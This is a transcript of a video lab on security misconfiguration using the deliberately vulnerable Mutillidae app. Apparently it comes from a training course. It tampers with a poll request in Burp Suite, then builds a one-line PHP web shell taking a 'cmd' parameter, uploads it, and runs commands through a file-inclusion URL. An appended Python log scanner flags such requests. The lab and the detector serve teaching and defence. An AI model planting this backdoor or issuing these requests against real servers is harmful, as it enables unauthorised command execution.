6.3 Security Misconfiguration Lab Instructions Part 2
12 hours 9 minutes
Hey, everyone, welcome back to the course. So in the last video, we went ahead and set up our Firefox as well as Burp Suite, and what we did is we went ahead and submitted a vote on the system. So we submitted a vote with Kismet, as well as whatever initials you wanted to use; in my case, I used Cybrary. Now we're back at Burp Suite.
So we've already clicked the HTTP history tab at the top left.
We do see the HTTP Mutillidae in there. And so what we're gonna do now is we're gonna right-click on that and we're gonna click the Send to Repeater option. So what we're gonna do is we're just gonna right-click right here.
And then just select the Send to Repeater; it's about 1/4 of the way down.
We'll click on that. You'll see the Repeater tab lights up a little bit. We're gonna go ahead and click on that next,
and we'll see our information in here. Now, if you notice that, we'll see the Kismet and then we'll see my initials; again, I used the word Cybrary, but you'll see that information in there.
Let's go back to our lab document. So we see that this was sent to the web application. We used a GET request here. Now, what we want to check for is if the web application server is actually vulnerable to,
uh, to this type of attack where we can change the type of request. So, for example, we could use a GET request, or we could use a POST request or whatever we want to use. We want to see if it's vulnerable to that.
So what we're gonna do is we're gonna change the Kismet. We're gonna change that to say Telnet, then just go ahead and change the initials as well, from whatever you used before; just change it into something else.
So let's go ahead and do that now. So we're gonna change Kismet to be Telnet.
All right. And now we're gonna change the initials. So I used Cybrary last time; we'll just use something like cap this time. That'll be fine.
All right, so our last step here: we want to click on the Go button once we've made those changes. So go and click the Go button here at the top left.
And then we're gonna minimize Burp Suite, so go ahead and minimize that, and we'll go back to Firefox.
All right, so the next thing we're gonna do is in our vote section here, we're gonna select tcpdump, and then we're gonna click that Submit Vote button.
And what we want to look for is if we see any type of entry regarding the Telnet that we just put in and that we submitted to Burp Suite with a POST request. So let's go ahead and do that now.
So here, we're gonna select tcpdump, and then we're just gonna click on Submit Vote.
We'll give it a moment or so; it should pull up for us and update everything.
Now, again, the question is, do we see Telnet in our results? So if we scroll down here and look at our voting results, do we see Telnet?
All right. Well, that was gonna be an easy one. Of course we do, right? At least on my end, I see Telnet there, so we know we were successful in running that.
So now what we're gonna do is just create a simple backdoor. So we're gonna get this set up, and we'll launch the terminal window in Kali Linux. We'll go ahead and create the backdoor file, and then we'll upload it and go from there.
So let's go and do that now.
So we'll scroll back up here. We're gonna go to OWASP on the left side here. So we're gonna go to the OWASP 2017. So we're here in step 43. We're gonna go to, excuse me, the OWASP 2017, we'll go back to the A6 Security Misconfiguration, and then we're gonna go to the file uploads, the Unrestricted File Upload option.
So let's go and do that now: 2017, and then the A6 again, the Security Misconfiguration. Then we'll see the second one from the bottom here is the Unrestricted File Upload.
Let's go ahead and click on that. It's gonna give you a little menu where you can upload a file.
So our next step here, we want to launch the Kali terminal. So we're gonna do that by clicking Applications at the very top left of our Kali window.
Under Applications we'll see Favorites, and then we'll see our terminal window right there. We're just going to click on that. It might take a few seconds or so, but then it'll pull up a terminal window for us.
All right, so we see it there.
So now what we're gonna do is we're gonna take this long command here, so we're gonna do it step by step, like we've done in previous labs. We're gonna take our time and just go through. Make sure we type everything correctly. We'll go ahead and then run this command and we'll go back to Firefox and we'll move forward in the lab from there.
So first things first, we're gonna start off with echo, and then we're just gonna put in the single quotation mark.
We're gonna open up the tag here, so we'll use the little alligator symbol
and then the question mark. So echo, single quotation, we'll do the opening tag and then the question mark.
So let's go and do that now. So echo, single quotation, opening tag and question mark.
All right, so now we're gonna type in php space system.
All right, so php.
Go back to our lab document. So now we're gonna type in the left parenthesis, the dollar sign and then the underscore symbol, and then the word GET. So we're gonna do parenthesis, dollar sign,
underscore, GET. So let's go ahead and do that now.
So again, no spacing here. We'll do the left parenthesis,
dollar sign, underscore, and then GET.
All right, let's go back to our lab document.
Now we're gonna type in a bracket here, the quotation marks, so just a regular quotation mark,
and then we're gonna type in cmd and end it with a quotation and a bracket. So basically, we're gonna type in brackets. Inside of that, we're gonna put quotation marks, and inside of those we'll put cmd.
So again, no spacing here and no spaces in between these.
So bracket, quotation, command, quotation, and then bracket again.
All right, so now we're gonna end with our parenthesis and a semicolon. So let's go and do that now. So end with our right parenthesis and a semicolon.
Let's go back to our lab document here. So now we're gonna type in the question mark, the closing tag there, and then the single quotation mark again.
So we'll put a space, we'll do a question mark.
Make sure I didn't space too far there.
We'll put a space with a question mark.
We'll put our closing tag and we'll do the quotation mark.
Now we're gonna add one more quotation mark; we'll put a space and then add that, and then we'll move into the last part of this command.
So we just put a space here,
do another closing tag there. Now we can move into our last part of the command. So this last part here, we're just gonna put Desktop forward slash backdoor dot php; again, we're just specifying where this particular file is gonna be created, so it's created on the desktop, so it's easier to find for us later.
So let's go and do that now. So Desktop, forward slash, backdoor.
All right. Once you type that, just double-check yourself. Make sure you typed everything correctly. If you have, we're gonna go ahead and just press Enter, and then we'll run this command. Now, nothing happened, right? What happened here? Well, it actually created the file for us. It doesn't tell us that, but we've created the file here.
All right. So we go back to Firefox now.
So now we're at step 48 here. So we've clicked back on Firefox. Now we're gonna click the gray icon, so it's to the right of this file name box, and that's gonna allow us to select the file that we just created for upload. So let's go ahead and do that now. So we're gonna click this little gray box here,
take a moment or so. Sometimes it's a little slow.
And there we go, and you see right away that it highlights the file we just created, so that's the one we want, backdoor dot php. Once you have that highlighted, just click Open at the top right.
That's just gonna open the file into the box here. And then we just click the Upload File button.
All right, so one question I have here for you: do you see the file path that the backdoor PHP file has been moved to? So where has it been moved to? If you look at the results here.
All right, so we see it's been moved to the tmp, so the temp folder. It's been moved into there.
All right, so the next thing we're gonna do is to type this long, uh, entry in the URL bar and press Enter. And then what we want to do is look for anything that says www-data. What that's gonna show us is that if we want to run any command, essentially by replacing the cmd parameter, or the command parameter, we could potentially gain full control over this particular operating system.
So let's go and do that now. We're just gonna type this command in like we've always been doing. We're gonna do it nice and slow so everyone can follow along.
So just click in the URL here. I always like to clear that out. And then just http, tpp, I was making up a new, uh, web thing there. All right. Colon, forward slash, forward slash, Mutillidae,
forward slash, Mutillidae,
and then we're gonna finish out by saying index dot php question mark page. So let's go ahead and do that. So index dot php question mark page. So put another forward slash, index dot php, question mark, and then page, and then we'll finish out the rest of our command.
So now we're gonna do equals tmp backdoor dot php.
So we're gonna do equals, forward slash, tmp, forward slash, backdoor dot php.
All right, we'll go back to our lab document here,
and then we want to put the "and", or the ampersand symbol, and then cmd equals id.
So we'll put, and essentially cmd equals id; we'll put our ampersand there,
cmd equals id.
All right. So again, just double-check yourself. Make sure you've typed everything correctly on your end. Once you have done so,
just go ahead and hit the Enter key on your keyboard, and we'll see what kind of results we get back.
So again, the question being here: do you see any information labeled as www-data?
And obviously we see it's all in there, right? So again, if we see that, that means that we can alter the command here and potentially look around and take control of this operating system. So, for example, if we just type dir, we could see some various information in here about what files exist on this particular web application.
So in this video, we just talked about security mis-, excuse me, security misconfiguration. It's just a quick overview of what it looks like. And in the next module we're gonna talk about cross-site scripting.
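
Editor's addition, not part of the video or the lab document: the request built in this lab (index.php with the page parameter pointing at the uploaded file under the temp folder, plus a cmd parameter) leaves a recognisable entry in the web server's access log. The Python check below flags such requests; the log lines, the `EXEC_PARAMS` list and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in Apache combined style (sample data only).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 5120',
    '10.0.0.9 - - [12/Mar/2024:10:04:40 +0000] "GET /mutillidae/index.php?page=/tmp/backdoor.php&cmd=id HTTP/1.1" 200 312',
    '10.0.0.9 - - [12/Mar/2024:10:05:11 +0000] "GET /mutillidae/index.php?page=%2Ftmp%2Fbackdoor.php&cmd=dir HTTP/1.1" 200 845',
    '10.0.0.7 - - [12/Mar/2024:10:06:30 +0000] "POST /mutillidae/index.php?page=user-poll.php HTTP/1.1" 200 7001',
]

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Parameter names commonly used to pass a command to a web shell (assumed list).
EXEC_PARAMS = {"cmd", "command", "exec"}


def inspect(line):
    """Return the reasons one log line looks like inclusion of an uploaded shell."""
    match = REQUEST_RE.match(line)
    if not match:
        return []
    query = parse_qs(urlsplit(match.group(3)).query, keep_blank_values=True)
    reasons = []
    for value in query.get("page", []):
        # parse_qs has already percent-decoded the value, so %2Ftmp is caught too.
        if value.startswith("/") or ".." in value.split("/"):
            reasons.append("page includes a path outside the app: " + value)
    for name in sorted(EXEC_PARAMS & set(query)):
        reasons.append("command-style parameter %s=%s" % (name, query[name][0]))
    return reasons


def scan(lines):
    """Map source IP to a list of (request target, reasons) for flagged lines."""
    hits = {}
    for line in lines:
        reasons = inspect(line)
        if reasons:
            match = REQUEST_RE.match(line)
            hits.setdefault(match.group(1), []).append((match.group(3), reasons))
    return hits


if __name__ == "__main__":
    for ip, events in scan(SAMPLE_LOG).items():
        for target, reasons in events:
            print(ip, target, "; ".join(reasons))
```

The same two conditions, a page value that is an absolute or traversing path and a command-style parameter on the same request, also work as a starting point for a WAF or SIEM rule.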